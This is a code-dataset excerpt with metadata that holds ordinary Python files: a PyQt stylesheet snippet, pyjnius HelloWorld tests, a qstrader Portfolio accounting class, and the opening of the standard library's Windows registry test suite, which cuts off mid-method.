QApplication.setAttribute(Qt.AA_EnableHighDpiScaling, True)
QApplication.setAttribute(Qt.AA_DisableWindowContextHelpButton)
QApplication.setAttribute(Qt.AA_UseStyleSheetPropagationInWidgetStyles, True)
app = App(sys.argv)
dirname = os.path.dirname(os.path.abspath(__file__))
ssFile = os.path.join(dirname, "stylesheet.qss")
dropDownPath = os.path.join(dirname, "Assets/baseline_arrow_drop_down_black_18dp.png").replace('\\', '/')
with open(ssFile) as fh:
styleSheet = fh.read()
styleSheet += """
QComboBox::down-arrow {
image: url(""" + dropDownPath + """);
}
"""
app.setStyleSheet(styleSheet)
sys.exit(app.exec_())
|
en
| 0.818897
|
# probably should use an signalling mechanism like an Event to stop gracefully QComboBox::down-arrow { image: url( ); }
| 2.550504
| 3
|
tests/test_simple.py
|
karpierz/jtypes.pyjnius
| 0
|
6628537
|
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import unittest
from jnius import JavaClass, MetaJavaClass, JavaMethod
from jnius import metaclass, java_class # <AK> for jt.jnius additions
from jnius import JavaField, JavaException # -||-
from six import with_metaclass
class HelloWorldTest(unittest.TestCase):
def test_helloworld(self):
class HelloWorld(with_metaclass(MetaJavaClass, JavaClass)):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
# <AK> additions for jt.jnius
def test_helloworld1(self):
@metaclass(MetaJavaClass)
class HelloWorld(JavaClass):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_helloworld2(self):
@metaclass(MetaJavaClass)
class HelloWorld(object):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_helloworld3(self):
@java_class()
class HelloWorld(object):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_helloworld4(self):
@java_class('org/jnius/HelloWorld')
class HelloWorld(object):
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_bad_field(self):
@java_class('org/jnius/HelloWorld')
class HelloWorld(object):
nonexistent = JavaField('I')
with self.assertRaises(JavaException) as exc:
a = HelloWorld()
# </AK>
|
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import unittest
from jnius import JavaClass, MetaJavaClass, JavaMethod
from jnius import metaclass, java_class # <AK> for jt.jnius additions
from jnius import JavaField, JavaException # -||-
from six import with_metaclass
class HelloWorldTest(unittest.TestCase):
def test_helloworld(self):
class HelloWorld(with_metaclass(MetaJavaClass, JavaClass)):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
# <AK> additions for jt.jnius
def test_helloworld1(self):
@metaclass(MetaJavaClass)
class HelloWorld(JavaClass):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_helloworld2(self):
@metaclass(MetaJavaClass)
class HelloWorld(object):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_helloworld3(self):
@java_class()
class HelloWorld(object):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_helloworld4(self):
@java_class('org/jnius/HelloWorld')
class HelloWorld(object):
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_bad_field(self):
@java_class('org/jnius/HelloWorld')
class HelloWorld(object):
nonexistent = JavaField('I')
with self.assertRaises(JavaException) as exc:
a = HelloWorld()
# </AK>
|
ja
| 0.330186
|
# <AK> for jt.jnius additions # -||- # <AK> additions for jt.jnius # </AK>
| 2.813461
| 3
|
qstrader/broker/portfolio/portfolio.py
|
tradingstrategy-ai/qstrader
| 1
|
6628538
|
<reponame>tradingstrategy-ai/qstrader<filename>qstrader/broker/portfolio/portfolio.py
import copy
import datetime
import logging
import pandas as pd
from qstrader import settings
from qstrader.broker.portfolio.portfolio_event import PortfolioEvent
from qstrader.broker.portfolio.position_handler import PositionHandler
logger = logging.getLogger(__name__)
class Portfolio(object):
"""
Represents a portfolio of assets. It contains a cash
account with the ability to subscribe and withdraw funds.
It also contains a list of positions in assets, encapsulated
by a PositionHandler instance.
Parameters
----------
start_dt : datetime
Portfolio creation datetime.
starting_cash : float, optional
Starting cash of the portfolio. Defaults to 100,000 USD.
currency: str, optional
The portfolio denomination currency.
portfolio_id: str, optional
An identifier for the portfolio.
name: str, optional
The human-readable name of the portfolio.
"""
def __init__(
self,
start_dt,
starting_cash=0.0,
currency="USD",
portfolio_id=None,
name=None
):
"""
Initialise the Portfolio object with a PositionHandler,
an event history, along with cash balance. Make sure
the portfolio denomination currency is also set.
"""
self.start_dt = start_dt
self.current_dt = start_dt
self.starting_cash = starting_cash
self.currency = currency
self.portfolio_id = portfolio_id
self.name = name
self.pos_handler = PositionHandler()
self.history = []
logger.info(
'(%s) Portfolio "%s" instance initialised' % (
self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
self.portfolio_id
)
)
self._initialise_portfolio_with_cash()
def _initialise_portfolio_with_cash(self):
"""
Initialise the portfolio with a (default) currency Cash Asset
with quantity equal to 'starting_cash'.
"""
self.cash = copy.copy(self.starting_cash)
if self.starting_cash > 0.0:
self.history.append(
PortfolioEvent.create_subscription(
self.current_dt, self.starting_cash, self.starting_cash
)
)
logger.info(
'(%s) Funds subscribed to portfolio "%s" '
'- Credit: %0.2f, Balance: %0.2f' % (
self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
self.portfolio_id,
round(self.starting_cash, 2),
round(self.starting_cash, 2)
)
)
@property
def total_market_value(self):
"""
Obtain the total market value of the portfolio excluding cash.
"""
return self.pos_handler.total_market_value()
@property
def total_equity(self):
"""
Obtain the total market value of the portfolio including cash.
"""
return self.total_market_value + self.cash
@property
def total_unrealised_pnl(self):
"""
Calculate the sum of all the positions' unrealised P&Ls.
"""
return self.pos_handler.total_unrealised_pnl()
@property
def total_realised_pnl(self):
"""
Calculate the sum of all the positions' realised P&Ls.
"""
return self.pos_handler.total_realised_pnl()
@property
def total_pnl(self):
"""
Calculate the sum of all the positions' total P&Ls.
"""
return self.pos_handler.total_pnl()
def subscribe_funds(self, dt, amount):
"""
Credit funds to the portfolio.
"""
if dt < self.current_dt:
raise ValueError(
'Subscription datetime (%s) is earlier than '
'current portfolio datetime (%s). Cannot '
'subscribe funds.' % (dt, self.current_dt)
)
self.current_dt = dt
if amount < 0.0:
raise ValueError(
'Cannot credit negative amount: '
'%s to the portfolio.' % amount
)
self.cash += amount
self.history.append(
PortfolioEvent.create_subscription(self.current_dt, amount, self.cash)
)
logger.info(
'(%s) Funds subscribed to portfolio "%s" '
'- Credit: %0.2f, Balance: %0.2f' % (
self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
self.portfolio_id, round(amount, 2),
round(self.cash, 2)
)
)
def withdraw_funds(self, dt, amount):
"""
Withdraw funds from the portfolio if there is enough
cash to allow it.
"""
# Check that amount is positive and that there is
# enough in the portfolio to withdraw the funds
if dt < self.current_dt:
raise ValueError(
'Withdrawal datetime (%s) is earlier than '
'current portfolio datetime (%s). Cannot '
'withdraw funds.' % (dt, self.current_dt)
)
self.current_dt = dt
if amount < 0:
raise ValueError(
'Cannot debit negative amount: '
'%0.2f from the portfolio.' % amount
)
if amount > self.cash:
raise ValueError(
'Not enough cash in the portfolio to '
'withdraw. %s withdrawal request exceeds '
'current portfolio cash balance of %s.' % (
amount, self.cash
)
)
self.cash -= amount
self.history.append(
PortfolioEvent.create_withdrawal(self.current_dt, amount, self.cash)
)
logger.info(
'(%s) Funds withdrawn from portfolio "%s" '
'- Debit: %0.2f, Balance: %0.2f' % (
self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
self.portfolio_id, round(amount, 2),
round(self.cash, 2)
)
)
def transact_asset(self, txn, allow_negative_balance=False):
"""
Adjusts positions to account for a transaction.
"""
if txn.dt < self.current_dt:
raise ValueError(
'Transaction datetime (%s) is earlier than '
'current portfolio datetime (%s). Cannot '
'transact assets.' % (txn.dt, self.current_dt)
)
self.current_dt = txn.dt
txn_share_cost = txn.price * txn.quantity
txn_total_cost = txn_share_cost + txn.commission
if txn_total_cost > self.cash:
error_msg = (
'WARNING: Not enough cash in the portfolio to '
'carry out transaction. Transaction cost of %s '
'exceeds remaining cash of %s. Transaction '
'will proceed with a negative cash balance.' % (
txn_total_cost, self.cash
)
)
if not allow_negative_balance:
raise RuntimeError(error_msg)
self.pos_handler.transact_position(txn)
self.cash -= txn_total_cost
# Form Portfolio history details
direction = "LONG" if txn.direction > 0 else "SHORT"
description = "%s %s %s %0.2f %s" % (
direction, txn.quantity, txn.asset,
txn.price, datetime.datetime.strftime(txn.dt, "%d/%m/%Y")
)
if direction == "LONG":
pe = PortfolioEvent(
dt=txn.dt, type='asset_transaction',
description=description,
debit=round(txn_total_cost, 2), credit=0.0,
balance=round(self.cash, 2),
txn=txn,
)
logger.info(
'(%s) Asset "%s" transacted LONG in portfolio "%s" '
'- Debit: %0.2f, Balance: %0.2f' % (
txn.dt.strftime(settings.LOGGING["DATE_FORMAT"]),
txn.asset, self.portfolio_id,
round(txn_total_cost, 2), round(self.cash, 2)
)
)
else:
pe = PortfolioEvent(
dt=txn.dt, type='asset_transaction',
description=description,
debit=0.0, credit=-1.0 * round(txn_total_cost, 2),
balance=round(self.cash, 2),
txn=txn,
)
logger.info(
'(%s) Asset "%s" transacted SHORT in portfolio "%s" '
'- Credit: %0.2f, Balance: %0.2f' % (
txn.dt.strftime(settings.LOGGING["DATE_FORMAT"]),
txn.asset, self.portfolio_id,
-1.0 * round(txn_total_cost, 2), round(self.cash, 2)
)
)
self.history.append(pe)
# TODO: Rename as there is now to_dict()
def portfolio_to_dict(self):
"""
Output the portfolio holdings information as a dictionary
with Assets as keys and sub-dictionaries as values.
This excludes cash.
Returns
-------
`dict`
The portfolio holdings.
"""
holdings = {}
for asset, pos in self.pos_handler.positions.items():
holdings[asset] = {
"quantity": pos.net_quantity,
"market_value": pos.market_value,
"unrealised_pnl": pos.unrealised_pnl,
"realised_pnl": pos.realised_pnl,
"total_pnl": pos.total_pnl
}
return holdings
def update_market_value_of_asset(
self, asset, current_price, current_dt
):
"""
Update the market value of the asset to the current
trade price and date.
"""
if asset not in self.pos_handler.positions:
return
else:
if current_price < 0.0:
raise ValueError(
'Current trade price of %s is negative for '
'asset %s. Cannot update position.' % (
current_price, asset
)
)
if current_dt < self.current_dt:
raise ValueError(
'Current trade date of %s is earlier than '
'current date %s of asset %s. Cannot update '
'position.' % (
current_dt, self.current_dt, asset
)
)
self.pos_handler.positions[asset].update_current_price(
current_price, current_dt
)
def history_to_df(self):
"""
Creates a Pandas DataFrame of the Portfolio history.
"""
records = [pe.to_dict() for pe in self.history]
return pd.DataFrame.from_records(
records, columns=[
"date", "type", "description", "debit", "credit", "balance"
]
).set_index(keys=["date"])
def to_dict(self) -> dict:
"""Export the current state of the portfolio as a dict."""
export = {
"name": self.name,
"total_equity": self.total_equity,
"total_market_value": self.total_market_value,
"currency": self.currency,
"cash": self.cash,
"assets": self.portfolio_to_dict(),
}
return export
|
import copy
import datetime
import logging
import pandas as pd
from qstrader import settings
from qstrader.broker.portfolio.portfolio_event import PortfolioEvent
from qstrader.broker.portfolio.position_handler import PositionHandler
logger = logging.getLogger(__name__)
class Portfolio(object):
"""
Represents a portfolio of assets. It contains a cash
account with the ability to subscribe and withdraw funds.
It also contains a list of positions in assets, encapsulated
by a PositionHandler instance.
Parameters
----------
start_dt : datetime
Portfolio creation datetime.
starting_cash : float, optional
Starting cash of the portfolio. Defaults to 100,000 USD.
currency: str, optional
The portfolio denomination currency.
portfolio_id: str, optional
An identifier for the portfolio.
name: str, optional
The human-readable name of the portfolio.
"""
def __init__(
self,
start_dt,
starting_cash=0.0,
currency="USD",
portfolio_id=None,
name=None
):
"""
Initialise the Portfolio object with a PositionHandler,
an event history, along with cash balance. Make sure
the portfolio denomination currency is also set.
"""
self.start_dt = start_dt
self.current_dt = start_dt
self.starting_cash = starting_cash
self.currency = currency
self.portfolio_id = portfolio_id
self.name = name
self.pos_handler = PositionHandler()
self.history = []
logger.info(
'(%s) Portfolio "%s" instance initialised' % (
self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
self.portfolio_id
)
)
self._initialise_portfolio_with_cash()
def _initialise_portfolio_with_cash(self):
"""
Initialise the portfolio with a (default) currency Cash Asset
with quantity equal to 'starting_cash'.
"""
self.cash = copy.copy(self.starting_cash)
if self.starting_cash > 0.0:
self.history.append(
PortfolioEvent.create_subscription(
self.current_dt, self.starting_cash, self.starting_cash
)
)
logger.info(
'(%s) Funds subscribed to portfolio "%s" '
'- Credit: %0.2f, Balance: %0.2f' % (
self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
self.portfolio_id,
round(self.starting_cash, 2),
round(self.starting_cash, 2)
)
)
@property
def total_market_value(self):
"""
Obtain the total market value of the portfolio excluding cash.
"""
return self.pos_handler.total_market_value()
@property
def total_equity(self):
"""
Obtain the total market value of the portfolio including cash.
"""
return self.total_market_value + self.cash
@property
def total_unrealised_pnl(self):
"""
Calculate the sum of all the positions' unrealised P&Ls.
"""
return self.pos_handler.total_unrealised_pnl()
@property
def total_realised_pnl(self):
"""
Calculate the sum of all the positions' realised P&Ls.
"""
return self.pos_handler.total_realised_pnl()
@property
def total_pnl(self):
"""
Calculate the sum of all the positions' total P&Ls.
"""
return self.pos_handler.total_pnl()
def subscribe_funds(self, dt, amount):
"""
Credit funds to the portfolio.
"""
if dt < self.current_dt:
raise ValueError(
'Subscription datetime (%s) is earlier than '
'current portfolio datetime (%s). Cannot '
'subscribe funds.' % (dt, self.current_dt)
)
self.current_dt = dt
if amount < 0.0:
raise ValueError(
'Cannot credit negative amount: '
'%s to the portfolio.' % amount
)
self.cash += amount
self.history.append(
PortfolioEvent.create_subscription(self.current_dt, amount, self.cash)
)
logger.info(
'(%s) Funds subscribed to portfolio "%s" '
'- Credit: %0.2f, Balance: %0.2f' % (
self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
self.portfolio_id, round(amount, 2),
round(self.cash, 2)
)
)
def withdraw_funds(self, dt, amount):
"""
Withdraw funds from the portfolio if there is enough
cash to allow it.
"""
# Check that amount is positive and that there is
# enough in the portfolio to withdraw the funds
if dt < self.current_dt:
raise ValueError(
'Withdrawal datetime (%s) is earlier than '
'current portfolio datetime (%s). Cannot '
'withdraw funds.' % (dt, self.current_dt)
)
self.current_dt = dt
if amount < 0:
raise ValueError(
'Cannot debit negative amount: '
'%0.2f from the portfolio.' % amount
)
if amount > self.cash:
raise ValueError(
'Not enough cash in the portfolio to '
'withdraw. %s withdrawal request exceeds '
'current portfolio cash balance of %s.' % (
amount, self.cash
)
)
self.cash -= amount
self.history.append(
PortfolioEvent.create_withdrawal(self.current_dt, amount, self.cash)
)
logger.info(
'(%s) Funds withdrawn from portfolio "%s" '
'- Debit: %0.2f, Balance: %0.2f' % (
self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
self.portfolio_id, round(amount, 2),
round(self.cash, 2)
)
)
def transact_asset(self, txn, allow_negative_balance=False):
"""
Adjusts positions to account for a transaction.
"""
if txn.dt < self.current_dt:
raise ValueError(
'Transaction datetime (%s) is earlier than '
'current portfolio datetime (%s). Cannot '
'transact assets.' % (txn.dt, self.current_dt)
)
self.current_dt = txn.dt
txn_share_cost = txn.price * txn.quantity
txn_total_cost = txn_share_cost + txn.commission
if txn_total_cost > self.cash:
error_msg = (
'WARNING: Not enough cash in the portfolio to '
'carry out transaction. Transaction cost of %s '
'exceeds remaining cash of %s. Transaction '
'will proceed with a negative cash balance.' % (
txn_total_cost, self.cash
)
)
if not allow_negative_balance:
raise RuntimeError(error_msg)
self.pos_handler.transact_position(txn)
self.cash -= txn_total_cost
# Form Portfolio history details
direction = "LONG" if txn.direction > 0 else "SHORT"
description = "%s %s %s %0.2f %s" % (
direction, txn.quantity, txn.asset,
txn.price, datetime.datetime.strftime(txn.dt, "%d/%m/%Y")
)
if direction == "LONG":
pe = PortfolioEvent(
dt=txn.dt, type='asset_transaction',
description=description,
debit=round(txn_total_cost, 2), credit=0.0,
balance=round(self.cash, 2),
txn=txn,
)
logger.info(
'(%s) Asset "%s" transacted LONG in portfolio "%s" '
'- Debit: %0.2f, Balance: %0.2f' % (
txn.dt.strftime(settings.LOGGING["DATE_FORMAT"]),
txn.asset, self.portfolio_id,
round(txn_total_cost, 2), round(self.cash, 2)
)
)
else:
pe = PortfolioEvent(
dt=txn.dt, type='asset_transaction',
description=description,
debit=0.0, credit=-1.0 * round(txn_total_cost, 2),
balance=round(self.cash, 2),
txn=txn,
)
logger.info(
'(%s) Asset "%s" transacted SHORT in portfolio "%s" '
'- Credit: %0.2f, Balance: %0.2f' % (
txn.dt.strftime(settings.LOGGING["DATE_FORMAT"]),
txn.asset, self.portfolio_id,
-1.0 * round(txn_total_cost, 2), round(self.cash, 2)
)
)
self.history.append(pe)
# TODO: Rename as there is now to_dict()
def portfolio_to_dict(self):
"""
Output the portfolio holdings information as a dictionary
with Assets as keys and sub-dictionaries as values.
This excludes cash.
Returns
-------
`dict`
The portfolio holdings.
"""
holdings = {}
for asset, pos in self.pos_handler.positions.items():
holdings[asset] = {
"quantity": pos.net_quantity,
"market_value": pos.market_value,
"unrealised_pnl": pos.unrealised_pnl,
"realised_pnl": pos.realised_pnl,
"total_pnl": pos.total_pnl
}
return holdings
def update_market_value_of_asset(
self, asset, current_price, current_dt
):
"""
Update the market value of the asset to the current
trade price and date.
"""
if asset not in self.pos_handler.positions:
return
else:
if current_price < 0.0:
raise ValueError(
'Current trade price of %s is negative for '
'asset %s. Cannot update position.' % (
current_price, asset
)
)
if current_dt < self.current_dt:
raise ValueError(
'Current trade date of %s is earlier than '
'current date %s of asset %s. Cannot update '
'position.' % (
current_dt, self.current_dt, asset
)
)
self.pos_handler.positions[asset].update_current_price(
current_price, current_dt
)
def history_to_df(self):
"""
Creates a Pandas DataFrame of the Portfolio history.
"""
records = [pe.to_dict() for pe in self.history]
return pd.DataFrame.from_records(
records, columns=[
"date", "type", "description", "debit", "credit", "balance"
]
).set_index(keys=["date"])
def to_dict(self) -> dict:
"""Export the current state of the portfolio as a dict."""
export = {
"name": self.name,
"total_equity": self.total_equity,
"total_market_value": self.total_market_value,
"currency": self.currency,
"cash": self.cash,
"assets": self.portfolio_to_dict(),
}
return export
|
en
| 0.846148
|
Represents a portfolio of assets. It contains a cash account with the ability to subscribe and withdraw funds. It also contains a list of positions in assets, encapsulated by a PositionHandler instance. Parameters ---------- start_dt : datetime Portfolio creation datetime. starting_cash : float, optional Starting cash of the portfolio. Defaults to 100,000 USD. currency: str, optional The portfolio denomination currency. portfolio_id: str, optional An identifier for the portfolio. name: str, optional The human-readable name of the portfolio. Initialise the Portfolio object with a PositionHandler, an event history, along with cash balance. Make sure the portfolio denomination currency is also set. Initialise the portfolio with a (default) currency Cash Asset with quantity equal to 'starting_cash'. Obtain the total market value of the portfolio excluding cash. Obtain the total market value of the portfolio including cash. Calculate the sum of all the positions' unrealised P&Ls. Calculate the sum of all the positions' realised P&Ls. Calculate the sum of all the positions' total P&Ls. Credit funds to the portfolio. Withdraw funds from the portfolio if there is enough cash to allow it. # Check that amount is positive and that there is # enough in the portfolio to withdraw the funds Adjusts positions to account for a transaction. # Form Portfolio history details # TODO: Rename as there is now to_dict() Output the portfolio holdings information as a dictionary with Assets as keys and sub-dictionaries as values. This excludes cash. Returns ------- `dict` The portfolio holdings. Update the market value of the asset to the current trade price and date. Creates a Pandas DataFrame of the Portfolio history. Export the current state of the portfolio as a dict.
| 2.669012
| 3
|
lib/python2.7/test/test_winreg.py
|
TinkerEdgeR-Android/prebuilts_python_linux-x86_2.7.5
| 2,151
|
6628539
|
# Test the windows specific win32reg module.
# Only win32reg functions not hit here: FlushKey, LoadKey and SaveKey
import os, sys, errno
import unittest
from test import test_support
threading = test_support.import_module("threading")
from platform import machine
# Do this first so test will be skipped if module doesn't exist
test_support.import_module('_winreg')
# Now import everything
from _winreg import *
try:
REMOTE_NAME = sys.argv[sys.argv.index("--remote")+1]
except (IndexError, ValueError):
REMOTE_NAME = None
# tuple of (major, minor)
WIN_VER = sys.getwindowsversion()[:2]
# Some tests should only run on 64-bit architectures where WOW64 will be.
WIN64_MACHINE = True if machine() == "AMD64" else False
# Starting with Windows 7 and Windows Server 2008 R2, WOW64 no longer uses
# registry reflection and formerly reflected keys are shared instead.
# Windows 7 and Windows Server 2008 R2 are version 6.1. Due to this, some
# tests are only valid up until 6.1
HAS_REFLECTION = True if WIN_VER < (6, 1) else False
# Use a per-process key to prevent concurrent test runs (buildbot!) from
# stomping on each other.
test_key_base = "Python Test Key [%d] - Delete Me" % (os.getpid(),)
test_key_name = "SOFTWARE\\" + test_key_base
# On OS'es that support reflection we should test with a reflected key
test_reflect_key_name = "SOFTWARE\\Classes\\" + test_key_base
test_data = [
("Int Value", 45, REG_DWORD),
("String Val", "A string value", REG_SZ),
("StringExpand", "The path is %path%", REG_EXPAND_SZ),
("Multi-string", ["Lots", "of", "string", "values"], REG_MULTI_SZ),
("Raw Data", ("binary"+chr(0)+"data"), REG_BINARY),
("Big String", "x"*(2**14-1), REG_SZ),
("Big Binary", "x"*(2**14), REG_BINARY),
]
if test_support.have_unicode:
test_data += [
(unicode("Unicode Val"), unicode("A Unicode value"), REG_SZ,),
("UnicodeExpand", unicode("The path is %path%"), REG_EXPAND_SZ),
("Multi-unicode", [unicode("Lots"), unicode("of"), unicode("unicode"),
unicode("values")], REG_MULTI_SZ),
("Multi-mixed", [unicode("Unicode"), unicode("and"), "string",
"values"], REG_MULTI_SZ),
]
class BaseWinregTests(unittest.TestCase):
def setUp(self):
# Make sure that the test key is absent when the test
# starts.
self.delete_tree(HKEY_CURRENT_USER, test_key_name)
def delete_tree(self, root, subkey):
try:
hkey = OpenKey(root, subkey, KEY_ALL_ACCESS)
except WindowsError:
# subkey does not exist
return
while True:
try:
subsubkey = EnumKey(hkey, 0)
except WindowsError:
# no more subkeys
break
self.delete_tree(hkey, subsubkey)
CloseKey(hkey)
DeleteKey(root, subkey)
def _write_test_data(self, root_key, CreateKey=CreateKey):
# Set the default value for this key.
SetValue(root_key, test_key_name, REG_SZ, "Default value")
key = CreateKey(root_key, test_key_name)
# Create a sub-key
sub_key = CreateKey(key, "sub_key")
# Give the sub-key some named values
for value_name, value_data, value_type in test_data:
SetValueEx(sub_key, value_name, 0, value_type, value_data)
# Check we wrote as many items as we thought.
nkeys, nvalues, since_mod = QueryInfoKey(key)
self.assertEqual(nkeys, 1, "Not the correct number of sub keys")
self.assertEqual(nvalues, 1, "Not the correct number of values")
nkeys, nvalues, since_mod = QueryInfoKey(sub_key)
self.assertEqual(nkeys, 0, "Not the correct number of sub keys")
self.assertEqual(nvalues, len(test_data),
"Not the correct number of values")
# Close this key this way...
# (but before we do, copy the key as an integer - this allows
# us to test that the key really gets closed).
int_sub_key = int(sub_key)
CloseKey(sub_key)
try:
QueryInfoKey(int_sub_key)
self.fail("It appears the CloseKey() function does "
"not close the actual key!")
except EnvironmentError:
pass
# ... and close that key that way :-)
int_key = int(key)
key.Close()
try:
QueryInfoKey(int_key)
self.fail("It appears the key.Close() function "
"does not close the actual key!")
except EnvironmentError:
pass
def _read_test_data(self, root_key, OpenKey=OpenKey):
# Check we can get default value for this key.
val = QueryValue(root_key, test_key_name)
self.assertEqual(val, "Default value",
"Registry didn't give back the correct value")
key = OpenKey(root_key, test_key_name)
# Read the sub-keys
with OpenKey(key, "sub_key") as sub_key:
# Check I can enumerate over the values.
index = 0
while 1:
try:
data = EnumValue(sub_key, index)
except EnvironmentError:
break
self.assertIn(data, test_data,
"Didn't read back the correct test data")
index = index + 1
self.assertEqual(index, len(test_data),
"Didn't read the correct number of items")
# Check I can directly access each item
for value_name, value_data, value_type in test_data:
read_val, read_typ = QueryValueEx(sub_key, value_name)
self.assertEqual(read_val, value_data,
"Could not directly read the value")
self.assertEqual(read_typ, value_type,
"Could not directly read the value")
sub_key.Close()
# Enumerate our main key.
read_val = EnumKey(key, 0)
self.assertEqual(read_val, "sub_key", "Read subkey value wrong")
try:
EnumKey(key, 1)
self.fail("Was able to get a second key when I only have one!")
except EnvironmentError:
pass
key.Close()
def _delete_test_data(self, root_key):
key = OpenKey(root_key, test_key_name, 0, KEY_ALL_ACCESS)
sub_key = OpenKey(key, "sub_key", 0, KEY_ALL_ACCESS)
# It is not necessary to delete the values before deleting
# the key (although subkeys must not exist). We delete them
# manually just to prove we can :-)
for value_name, value_data, value_type in test_data:
DeleteValue(sub_key, value_name)
nkeys, nvalues, since_mod = QueryInfoKey(sub_key)
self.assertEqual(nkeys, 0, "subkey not empty before delete")
self.assertEqual(nvalues, 0, "subkey not empty before delete")
sub_key.Close()
DeleteKey(key, "sub_key")
try:
# Shouldnt be able to delete it twice!
DeleteKey(key, "sub_key")
self.fail("Deleting the key twice succeeded")
except EnvironmentError:
pass
key.Close()
DeleteKey(root_key, test_key_name)
# Opening should now fail!
try:
key = OpenKey(root_key, test_key_name)
self.fail("Could open the non-existent key")
except WindowsError: # Use this error name this time
pass
def _test_all(self, root_key):
self._write_test_data(root_key)
self._read_test_data(root_key)
self._delete_test_data(root_key)
class LocalWinregTests(BaseWinregTests):
def test_registry_works(self):
self._test_all(HKEY_CURRENT_USER)
def test_registry_works_extended_functions(self):
# Substitute the regular CreateKey and OpenKey calls with their
# extended counterparts.
# Note: DeleteKeyEx is not used here because it is platform dependent
cke = lambda key, sub_key: CreateKeyEx(key, sub_key, 0, KEY_ALL_ACCESS)
self._write_test_data(HKEY_CURRENT_USER, cke)
oke = lambda key, sub_key: OpenKeyEx(key, sub_key, 0, KEY_READ)
self._read_test_data(HKEY_CURRENT_USER, oke)
self._delete_test_data(HKEY_CURRENT_USER)
def test_connect_registry_to_local_machine_works(self):
# perform minimal ConnectRegistry test which just invokes it
h = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
self.assertNotEqual(h.handle, 0)
h.Close()
self.assertEqual(h.handle, 0)
def test_inexistant_remote_registry(self):
connect = lambda: ConnectRegistry("abcdefghijkl", HKEY_CURRENT_USER)
self.assertRaises(WindowsError, connect)
def test_expand_environment_strings(self):
r = ExpandEnvironmentStrings(u"%windir%\\test")
self.assertEqual(type(r), unicode)
self.assertEqual(r, os.environ["windir"] + "\\test")
def test_context_manager(self):
# ensure that the handle is closed if an exception occurs
try:
with ConnectRegistry(None, HKEY_LOCAL_MACHINE) as h:
self.assertNotEqual(h.handle, 0)
raise WindowsError
except WindowsError:
self.assertEqual(h.handle, 0)
def test_changing_value(self):
# Issue2810: A race condition in 2.6 and 3.1 may cause
# EnumValue or QueryValue to raise "WindowsError: More data is
# available"
done = False
class VeryActiveThread(threading.Thread):
def run(self):
with CreateKey(HKEY_CURRENT_USER, test_key_name) as key:
use_short = True
long_string = 'x'*2000
while not done:
s = 'x' if use_short else long_string
use_short = not use_short
SetValue(key, 'changing_value', REG_SZ, s)
thread = VeryActiveThread()
thread.start()
try:
with CreateKey(HKEY_CURRENT_USER,
test_key_name+'\\changing_value') as key:
for _ in range(1000):
num_subkeys, num_values, t = QueryInfoKey(key)
for i in range(num_values):
name = EnumValue(key, i)
QueryValue(key, name[0])
finally:
done = True
thread.join()
with OpenKey(HKEY_CURRENT_USER, test_key_name, 0, KEY_ALL_ACCESS) as key:
DeleteKey(key, 'changing_value')
DeleteKey(HKEY_CURRENT_USER, test_key_name)
def test_long_key(self):
# Issue2810, in 2.6 and 3.1 when the key name was exactly 256
# characters, EnumKey raised "WindowsError: More data is
# available"
name = 'x'*256
try:
with CreateKey(HKEY_CURRENT_USER, test_key_name) as key:
SetValue(key, name, REG_SZ, 'x')
num_subkeys, num_values, t = QueryInfoKey(key)
EnumKey(key, 0)
finally:
with OpenKey(HKEY_CURRENT_USER, test_key_name, 0, KEY_ALL_ACCESS) as key:
DeleteKey(key, name)
DeleteKey(HKEY_CURRENT_USER, test_key_name)
def test_dynamic_key(self):
# Issue2810, when the value is dynamically generated, these
# raise "WindowsError: More data is available" in 2.6 and 3.1
try:
EnumValue(HKEY_PERFORMANCE_DATA, 0)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES):
self.skipTest("access denied to registry key "
"(are you running in a non-interactive session?)")
raise
QueryValueEx(HKEY_PERFORMANCE_DATA, None)
# Reflection requires XP x64/Vista at a minimum. XP doesn't have this stuff
# or DeleteKeyEx so make sure their use raises NotImplementedError
@unittest.skipUnless(WIN_VER < (5, 2), "Requires Windows XP")
def test_reflection_unsupported(self):
try:
with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
self.assertNotEqual(ck.handle, 0)
key = OpenKey(HKEY_CURRENT_USER, test_key_name)
self.assertNotEqual(key.handle, 0)
with self.assertRaises(NotImplementedError):
DisableReflectionKey(key)
with self.assertRaises(NotImplementedError):
EnableReflectionKey(key)
with self.assertRaises(NotImplementedError):
QueryReflectionKey(key)
with self.assertRaises(NotImplementedError):
DeleteKeyEx(HKEY_CURRENT_USER, test_key_name)
finally:
DeleteKey(HKEY_CURRENT_USER, test_key_name)
def test_setvalueex_value_range(self):
